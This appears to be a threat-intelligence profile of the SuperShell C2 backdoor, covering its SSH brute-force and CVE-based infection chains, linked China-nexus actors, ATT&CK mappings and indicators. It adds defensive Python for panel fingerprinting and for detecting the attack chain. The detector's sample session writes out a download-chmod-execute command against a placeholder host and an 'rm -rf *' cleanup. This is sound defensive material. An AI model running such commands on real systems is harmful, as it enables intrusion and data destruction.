Malware. Used by 3 actors. Exploits 7 CVEs.

SuperShell

SuperShell is an open-source command-and-control (C2) framework and backdoor, commonly described as a Go-based reverse shell used to remotely control compromised systems and execute arbitrary commands. Public reporting describes it as targeting Linux SSH servers in particular, while supporting cross-platform operation on Linux, Windows, and Android. The C2 panel is accessed through a web service, and the implant obtains a fully interactive shell by establishing a reverse SSH tunnel from the victim back to the panel. Exposed panels have been identified via fingerprints such as the HTML title "Supershell" and the favicon hash -1010228102.
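Added example (not code from the page's sources or from the SuperShell project): a pure-Python MurmurHash3 x86_32 so the Shodan-style favicon hash (mmh3 over the newline-wrapped base64 encoding of the icon bytes) can be computed offline and compared against the -1010228102 value above, together with a check of the HTML title. The HTML response and icon bytes below are constructed placeholders; the placeholder icon will not match the published hash, which is the point of keeping the two checks separate.

```python
import base64
import re
from typing import Optional

# Fingerprints for exposed Supershell panels, as reported in the text above.
SUPERSHELL_TITLE = "Supershell"
SUPERSHELL_FAVICON_HASH = -1010228102


def murmurhash3_x86_32(data: bytes, seed: int = 0) -> int:
    """MurmurHash3 x86_32, returned as a signed 32-bit int (same convention as mmh3.hash)."""
    c1, c2 = 0xCC9E2D51, 0x1B873593
    mask = 0xFFFFFFFF
    h1 = seed & mask
    n_blocks = len(data) // 4
    # Body: consume the input in 4-byte little-endian blocks.
    for i in range(n_blocks):
        k1 = int.from_bytes(data[4 * i:4 * i + 4], "little")
        k1 = (k1 * c1) & mask
        k1 = ((k1 << 15) | (k1 >> 17)) & mask
        k1 = (k1 * c2) & mask
        h1 ^= k1
        h1 = ((h1 << 13) | (h1 >> 19)) & mask
        h1 = (h1 * 5 + 0xE6546B64) & mask
    # Tail: 0 to 3 leftover bytes, mixed in the reference order (byte 2, then 1, then 0).
    tail = data[4 * n_blocks:]
    k1 = 0
    if len(tail) >= 3:
        k1 ^= tail[2] << 16
    if len(tail) >= 2:
        k1 ^= tail[1] << 8
    if len(tail) >= 1:
        k1 ^= tail[0]
        k1 = (k1 * c1) & mask
        k1 = ((k1 << 15) | (k1 >> 17)) & mask
        k1 = (k1 * c2) & mask
        h1 ^= k1
    # Finalization (fmix32).
    h1 ^= len(data)
    h1 ^= h1 >> 16
    h1 = (h1 * 0x85EBCA6B) & mask
    h1 ^= h1 >> 13
    h1 = (h1 * 0xC2B2AE35) & mask
    h1 ^= h1 >> 16
    return h1 - (1 << 32) if h1 & 0x80000000 else h1


def shodan_favicon_hash(favicon: bytes) -> int:
    """Shodan-style favicon hash: mmh3 over base64 with 76-column line wrapping (base64.encodebytes)."""
    return murmurhash3_x86_32(base64.encodebytes(favicon))


_TITLE_RE = re.compile(r"<title[^>]*>(.*?)</title>", re.IGNORECASE | re.DOTALL)


def html_title(html: str) -> Optional[str]:
    """First <title> element, whitespace-normalised; None if absent."""
    m = _TITLE_RE.search(html)
    return " ".join(m.group(1).split()) if m else None


def match_supershell(html: str, favicon: Optional[bytes]) -> dict:
    """Report which of the two published panel fingerprints a response matches."""
    title = html_title(html)
    fav_hash = shodan_favicon_hash(favicon) if favicon is not None else None
    return {
        "title_match": title is not None and title.lower() == SUPERSHELL_TITLE.lower(),
        "favicon_match": fav_hash == SUPERSHELL_FAVICON_HASH,
        "title": title,
        "favicon_hash": fav_hash,
    }


# Constructed sample response (not a real capture): the title matches, the icon is a
# placeholder whose hash will not equal the published value.
SAMPLE_HTML = "<html><head><title>\n  Supershell \n</title></head><body></body></html>"
SAMPLE_FAVICON = b"\x00\x00\x01\x00placeholder-icon-bytes"

if __name__ == "__main__":
    print(match_supershell(SAMPLE_HTML, SAMPLE_FAVICON))
```

A title match alone is weak (anyone can serve that string); the favicon hash is the stronger pivot, but both are only leads until the host is confirmed to answer like the panel.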

Observed infection vectors include brute-force and dictionary attacks against weak SSH credentials on Linux SSH servers, followed by download-and-execute chains using wget, curl, tftp, FTP, or shell scripts. Installation has been observed in directories such as /tmp, /var/run, /mnt, and /root, sometimes with cleanup commands to remove traces. SuperShell has also been deployed after exploitation of public-facing vulnerabilities, including CVE-2023-46747 on F5 BIG-IP devices, CVE-2024-1709 in ConnectWise ScreenConnect, CVE-2025-31324 in SAP NetWeaver, and CVE-2025-8110 in Gogs. In the Gogs exploitation campaign, attackers created repositories with random 8-character names and deployed a SuperShell payload; infected systems communicated with attacker-controlled infrastructure including 119.45.176[.]196, and payload servers included 106.53.108[.]81 and 119.91.42[.]53.
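Added example, not code from any of the cited reports: host-side detection logic for the SSH chain described above, run over constructed sshd log lines and a constructed shell session. It flags a password login preceded by a burst of failures from the same source, then scores a session for the four stages the reporting names: download into a staging directory, chmod +x, execution from that directory, and recursive cleanup. The hostname, timestamps and the example.invalid URL are made up; the 209.141.60.249 source is one of the attack-source IPs listed later on this page.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Staging directories and downloaders named in the reporting above.
STAGING_DIRS = ("/tmp", "/var/run", "/mnt", "/root")
DOWNLOADERS = {"wget", "curl", "tftp", "ftp"}

# sshd syslog lines carry no year, so the caller supplies one. Key-based logins
# ("Accepted publickey") deliberately do not match: the chain is password brute force.
AUTH_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def _parse_ts(text: str, year: int) -> datetime:
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def find_bruteforce_logins(lines: List[str], year: int = 2025, min_failures: int = 5,
                           window: timedelta = timedelta(minutes=10)) -> List[dict]:
    """Password logins preceded by at least min_failures failures from the same IP within window."""
    failures: Dict[str, List[datetime]] = defaultdict(list)
    hits = []
    for line in lines:
        m = AUTH_RE.match(line)
        if not m:
            continue
        ts, ip = _parse_ts(m["ts"], year), m["ip"]
        if m["result"] == "Failed":
            failures[ip].append(ts)
            continue
        recent = [t for t in failures[ip] if ts - t <= window]
        if len(recent) >= min_failures:
            hits.append({"ip": ip, "user": m["user"], "ts": ts, "failures": len(recent)})
    return hits


def _in_staging(path: str) -> bool:
    return any(path == d or path.startswith(d + "/") for d in STAGING_DIRS)


def _executes_from_staging(argv: List[str], cwd: str) -> bool:
    prog = argv[0]
    if prog.startswith("./"):
        return _in_staging(cwd)
    if prog in ("sh", "bash"):
        return any(_in_staging(a) for a in argv[1:]) or (
            _in_staging(cwd) and any(not a.startswith("-") for a in argv[1:]))
    return _in_staging(prog)


def score_command_chain(commands: List[str]) -> dict:
    """Flag the download -> chmod +x -> execute -> cleanup pattern in a post-login session."""
    stages = {"download_to_staging": False, "make_executable": False,
              "execute_from_staging": False, "cleanup": False}
    cwd = "/"
    for line in commands:
        # Split compound lines so "cd /tmp && wget ... && ./x" is seen as separate commands.
        for simple in re.split(r"\s*(?:&&|\|\||;|\|)\s*", line.strip()):
            argv = simple.split()
            if not argv:
                continue
            prog = argv[0]
            if prog == "cd" and len(argv) > 1:
                cwd = argv[1]
            elif prog in DOWNLOADERS and (_in_staging(cwd) or any(_in_staging(a) for a in argv[1:])):
                stages["download_to_staging"] = True
            elif prog == "chmod" and len(argv) > 2:
                mode = argv[1]
                octal_exec = re.fullmatch(r"[0-7]{3,4}", mode) and any(int(d) & 1 for d in mode[-3:])
                if "+x" in mode or octal_exec:
                    stages["make_executable"] = True
            elif _executes_from_staging(argv, cwd):
                stages["execute_from_staging"] = True
            elif prog == "rm" and any(a.startswith("-") and "r" in a for a in argv[1:]) and (
                    _in_staging(cwd) or any(_in_staging(a) for a in argv[1:])):
                stages["cleanup"] = True
    result = dict(stages)
    result["score"] = sum(stages.values())
    return result


# Constructed sample telemetry (not real captures).
SAMPLE_AUTH_LOG = [
    "Jan 12 03:14:01 srv1 sshd[4101]: Failed password for root from 209.141.60.249 port 50122 ssh2",
    "Jan 12 03:14:02 srv1 sshd[4103]: Failed password for root from 209.141.60.249 port 50124 ssh2",
    "Jan 12 03:14:03 srv1 sshd[4105]: Failed password for root from 209.141.60.249 port 50126 ssh2",
    "Jan 12 03:14:04 srv1 sshd[4107]: Failed password for root from 209.141.60.249 port 50128 ssh2",
    "Jan 12 03:14:05 srv1 sshd[4109]: Failed password for root from 209.141.60.249 port 50130 ssh2",
    "Jan 12 03:14:06 srv1 sshd[4111]: Accepted password for root from 209.141.60.249 port 50132 ssh2",
    "Jan 12 08:30:00 srv1 sshd[5200]: Accepted publickey for deploy from 10.0.0.5 port 41000 ssh2",
]
SAMPLE_SESSION = [
    "cd /tmp && wget http://example.invalid/ssh1 -O ssh1 && chmod 755 ssh1 && ./ssh1",
    "rm -rf *",
]
BENIGN_SESSION = [
    "cd /home/dev",
    "curl -sSLO https://example.invalid/tool.tar.gz",
    "tar xzf tool.tar.gz",
    "rm -rf tool",
]

if __name__ == "__main__":
    print(find_bruteforce_logins(SAMPLE_AUTH_LOG))
    print(score_command_chain(SAMPLE_SESSION), score_command_chain(BENIGN_SESSION))
```

In practice the session commands come from auditd execve records or a shell-history collector keyed on the sshd session; the join key to the brute-force hit is the source IP and login time, which is why both functions return them.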

The malware has repeatedly been associated with China-linked activity. AhnLab reported it was created by a Chinese-speaking developer. Mandiant assessed with moderate confidence that the combination of custom tooling and SUPERSHELL was unique to the PRC-linked actor UNC5174, which exploited F5 BIG-IP and ScreenConnect vulnerabilities and targeted U.S. and UK government, defense, research and education, NGOs, Hong Kong businesses, and institutions in Asia. Forescout-linked reporting associated infrastructure hosting Supershell backdoors with the suspected Chinese actor Chaya_004. Cisco Talos noted infrastructure overlap in which hosts using a Bulbature certificate were also associated with SuperShell, GobRAT, and Cobalt Strike, all described as commonly associated with China-nexus actors. Additional reporting cited SuperShell use in campaigns targeting Windows and Linux servers in South Korea, and its appearance in broader exploitation waves such as React2Shell-related intrusions.

SuperShell has also been observed alongside additional payloads, especially XMRig Monero miners, indicating both persistence and cryptocurrency-mining objectives in some Linux SSH server compromises. Reported indicators include sample hashes such as ssh1.sh (SHA-256 157bea84012ca8b8dc6c0eabf80db1f0256eafccf4047d3e4e90c50ed42e69ff), setup c3pool miner.sh (SHA-256 23dbfb99fc6c4fcfc279100c4b6481a7fd3f0b061b8d915604efa2ba37c8ddfa), ssh1 (SHA-256 cf5a7b7c71564a5eef77cc5297b9ffd6cd021eb44c0901ea3957cb2397b43e15), and the MD5s 4ee4f1e7456bb2b3d13e93797b9efbd3, 5ab6e938028e6e9766aa7574928eb062, and e06a1ba2f45ba46b892bef017113af09. Additional infrastructure and related indicators include 47.97.42[.]177 and 45.15.143[.]197, and the attack-source IPs 209.141.60[.]249, 179.61.253[.]67, 107.189.8[.]15, and 2.58.84[.]90.


Exploited CVEs

7 CVEs correlated with this family across public research and vendor advisories.
CVE-2025-31324: Unauthenticated Arbitrary File Upload in SAP NetWeaver Visual Composer Metadata Uploader (exploited in the wild)

On April 24, 2025, SAP disclosed CVE-2025-31324, a critical vulnerability with a CVSS score of 10.0 affecting SAP NetWeaver's Visual Composer Framework, version 7.50. This vulnerability allows unauthenticated users to upload arbitrary files to an SAP NetWeaver application server, leading to potential remote code execution (RCE) and full system compromise. [...] The IP address 47.97.42[.]177 has also been associated with malware based on the open-source tool SUPERSHELL.

via Palo Alto Networks Unit 42 blog (unit42.paloaltonetworks.com)
CVE-2025-8110: Gogs PutContents API symlink path traversal leading to code execution (exploited in the wild)

A vulnerability in self-hosted Git service Gogs is facing widespread exploitation, and no patch is available at this time. That's according to Wiz, which on Dec. 10 published research disclosing CVE-2025-8110, a bypass for a remote code execution vulnerability disclosed for Gogs last year (CVE-2024-55947).

via Dark Reading (darkreading.com)
CVE-2023-46747: Authentication Bypass and RCE in F5 BIG-IP TMUI (exploited in the wild)

Mandiant observed novel N-day exploitation of CVE-2023-46747 affecting F5 BIG-IP Traffic Management User Interface... UNC5174 has been observed attempting to sell access... following CVE-2023-46747 exploitation.

via Mandiant Threat Intelligence (cloud.google.com)
CVE-2023-22518: Improper Authorization in Atlassian Confluence Data Center and Server

"This mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174."

via Mandiant Threat Intelligence (cloud.google.com)
CVE-2024-1709: Authentication Bypass in ConnectWise ScreenConnect (exploited in the wild)

In February 2024, we observed exploitation of Connectwise ScreenConnect CVE-2024-1709 by the same actor... to compromise hundreds of institutions primarily in the U.S. and Canada.

via Mandiant Threat Intelligence (cloud.google.com)
CVE-2022-0185: Linux kernel legacy_parse_param heap overflow, local privilege escalation

"This mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174."

via Mandiant Threat Intelligence (cloud.google.com)
CVE-2022-30525: Unauthenticated OS Command Injection in Zyxel USG FLEX, ATP, and VPN Series

"This mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174."

via Mandiant Threat Intelligence (cloud.google.com)
Threat Actors

3 distinct threat actors attributed by public researchers.
Chaya_004

Forescout Vedere Labs linked some of the ongoing attacks to a suspected Chinese threat actor they track as Chaya_004. The threat actor uses malicious infrastructure that includes "a network of servers hosting Supershell backdoors..."

via Dark Reading (darkreading.com)
china_linked_threat_actors

Wiz researchers detected Supershell on an infected system, which is an open source command-and-control framework that has been used by China-linked threat actors.

via Dark Reading (darkreading.com)
UNC5174

"This mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174."

via Mandiant Threat Intelligence (cloud.google.com)
MITRE ATT&CK

20 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

2 techniques
T1583.003 Acquire Infrastructure: Virtual Private Server (1 evidence item)

Source ATT&CK mapping table, Resource Development, Acquire Infrastructure: Virtual Private Server (T1583.003): Alibaba Cloud VPS

T1587.001 Develop Capabilities: Malware (1 evidence item)

Source ATT&CK mapping table, Resource Development, Develop Capabilities: Malware (T1587.001): SuperShell payload generation

Initial Access

2 techniques
T1078 Valid Accounts (1 evidence item)

Once access is gained, attackers execute a series of commands to download and install SuperShell...

T1190 Exploit Public-Facing Application (2 evidence items)

"In February 2024, we observed exploitation of Connectwise ScreenConnect CVE-2024-1709 by the same actor."

Execution

2 techniques
T1059 Command and Scripting Interpreter (3 evidence items)

Reverse shell client payloads supporting multiple system architectures... supports automatic client reconnection after disconnect

T1059.004 Command and Scripting Interpreter: Unix Shell (1 evidence item)

Typically, the payload involves downloading a script or binary, which is then executed with elevated permissions using chmod +x followed by execution (./ssh1).

Persistence

2 techniques
T1078 Valid Accounts (1 evidence item)

Once access is gained, attackers execute a series of commands to download and install SuperShell...

T1543.003 Create or Modify System Process: Windows Service (1 evidence item)

Supports installing the reverse shell as a Windows service

Privilege Escalation

3 techniques
T1068 Exploitation for Privilege Escalation (1 evidence item)

"Linux Kernel Exploit CVE-2022-0185"

T1078 Valid Accounts (1 evidence item)

Once access is gained, attackers execute a series of commands to download and install SuperShell...

T1543.003 Create or Modify System Process: Windows Service (1 evidence item)

Supports installing the reverse shell as a Windows service

Defense Evasion

3 techniques
T1070.004 Indicator Removal: File Deletion (1 evidence item)

...commands often including clean-up actions to remove traces post-installation (rm -r *).

T1078 Valid Accounts (1 evidence item)

Once access is gained, attackers execute a series of commands to download and install SuperShell...

T1620 Reflective Code Loading (2 evidence items)

Supports in-memory injection, i.e. running the trojan without writing it to disk (a memory-resident implant)

Credential Access

1 technique
T1110 Brute Force (1 evidence item)

The attack begins with brute force and dictionary attacks against SSH servers, using weak credentials like "root/password" and "root/123456qwerty."

Lateral Movement

1 technique
T1021.004 Remote Services: SSH (2 evidence items)

Obtains a fully interactive shell by establishing a reverse SSH tunnel

Command and Control

6 techniques
T1071 Application Layer Protocol (3 evidence items)

Supershell is a C2 remote-control platform accessed through a web service... by establishing a reverse SSH tunnel on the target host, it obtains a genuinely fully interactive shell

T1071.001 Application Layer Protocol: Web Protocols (1 evidence item)

Source ATT&CK mapping table, Command and Control, Application Layer Protocol: Web Protocols (T1071.001): HTTP-based C2 panel

T1090 Proxy (2 evidence items)

We observed attackers deploying other reverse shell tools... GOREVERSE has the following capabilities: ... Dynamic, local and remote forwarding ... Multiple network transports... We observed an attacker execute ... a Base64-encoded PowerShell script... Uses ssh.exe to establish a remote tunnel to the C2 server.

T1090.003 Proxy: Multi-hop Proxy (1 evidence item)

Source ATT&CK mapping table, Command and Control, Proxy: Multi-hop Proxy (T1090.003): RSSH reverse tunnel over WebSocket

T1105 Ingress Tool Transfer (2 evidence items)

Supports file management and a file server... transfers files with the local native sftp command

T1219 Remote Access Tools (1 evidence item)

SuperShell ... operates as a reverse shell, enabling attackers to execute commands remotely on the compromised systems.

Exfiltration

1 technique
T1041 Exfiltration Over C2 Channel (1 evidence item)

Source ATT&CK mapping table, Exfiltration, Exfiltration Over C2 Channel (T1041): File download via RSSH tunnel

Impact

1 technique
T1496 Resource Hijacking (1 evidence item)

Additionally, the attackers often deploy XMRig, a Monero cryptocurrency miner, alongside SuperShell...

Indicators of Compromise

1,512 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.

Network: 18 tracked (IPs, domains, and DNS infrastructure linked to this family).

Hashes: 3 tracked (file hashes, MD5, SHA-1, SHA-256, from samples and reports).

Other: 1,491 tracked (other indicator types observed in public reporting, mostly URIs).
